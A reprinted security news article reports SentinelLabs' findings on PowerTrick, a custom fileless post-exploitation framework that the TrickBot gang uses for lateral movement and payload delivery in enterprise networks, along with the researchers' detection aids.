TrickBot Gang Created a Custom Post-Exploitation Framework

TrickBot Gang Created a Custom Post-Exploitation Framework

Instead of relying on premade and well-known toolkits, the threat actors behind the TrickBot trojan decided to develop a private post-exploitation toolkit called PowerTrick to spread malware laterally throughout a network.

When an attacker gains access to a victim’s network, they will attempt to quietly gain access to user and administrator credentials and then laterally spread to the other devices on the network.

This type of lateral movement is typically done through post-exploitation toolkits or frameworks, such as PowerShell Empire, that makes it easier to harvest credentials, execute commands on computers, and deploy malware.

It starts with a backdoor

To generate the most revenue during a network compromise, TrickBot has started to focus more on the enterprise environment with the release of new modules and by partnering with the Ryuk ransomware actors.

“TrickBot has shifted focus to enterprise environments over the years to incorporate everything from network profiling, mass data collection, incorporation of lateral traversal exploits. This focus shift is also prevalent in their incorporation of malware and techniques in their tertiary deliveries that are targeting enterprise environments. It is similar to a company where the focus shifts depending on what generates the best revenue,” the SentinelLabs researchers explained in a new report shared with BleepingComputer.

PowerTrick acts as a fileless post-exploitation framework developed by the TrickBot actors that allow its operators to perform stealthy and persistent reconnaissance and lateral compromises inside of networks that have been determined to be of high value.

PowerTrick Human Network Exploitation Operator
PowerTrick Human Network Exploitation Operator
(Source: SentinelLabs)

While existing post-exploitation frameworks exist, such as PowerShell Empire, the TrickBot actors decided to create a private framework to evade detection and to create a tool that satisfies their own particular needs.

“Lots of discourse was about OSINT offensive tools used by malware operators – here, the TrickBot actors used their own tools to evade detection,” Vitali Kremez, Head of SentinelLabs, told BleepingComputer.

Similar to PowerShell Empire, on networks where PowerTrick is deployed, the initial “staging” program will download a more feature-rich backdoor that allows the attacker to execute further PowerShell commands, harvest credentials, install additional backdoors, and spread laterally throughout the network.

PowerTrick Payloads
PowerTrick Payloads
(Source: SentinelLabs)

Some of the tools seen being installed by PowerTrick include the TrickBot Anchor malware and the ‘More_Eggs’ JavaScript backdoor.  These tools are installed through the PowerTrick reverse shell by executing PowerShell commands that download the software.

Anchor download command
Anchor download command

In addition to the malware payloads, PowerTrick will also allow the actor to issue commands that are ‘hexified” to bypass security solutions.

Direct shell commands
Direct shell commands
(Source: SentinelLabs)

As PowerShell Empire and other well-known post-exploitation frameworks are commonly detected by security solutions, by creating a private fileless framework, the TrickBot actors can evade these solutions.

“The top-tier cybercrime enterprise offensive tooling such as “PowerTrick” is flexible and effective which allows the TrickBot cybercrime actors to leverage them to augment on the fly and stay stealthy as opposed to using larger more open source systems such as PowerShell Empire,” Kremez told BleepingComputer. “The end-goal of the PowerTrick backdoor and its approach is to bypass restrictions and security controls to adapt to the new age of security controls and exploit the most protected and secure high-value networks.”

Fake PowerTrick C2 created for testing network security

To assist organizations in testing their network security against PowerTrick, SentinelLabs has created a mock command and control panel and various PowerShell commands that emulate PowerTrick communication.

Using this mock panel and the PowerShell commands, organizations can test their network security solutions against the PowerTrick communication to make sure it is detected.

To further help, SentinelLabs has created a variety of Suricata rules that can be used to detect malicious traffic associated with this framework.

Related Articles:

This content was originally published here.

Laat een reactie achter

Het e-mailadres wordt niet gepubliceerd.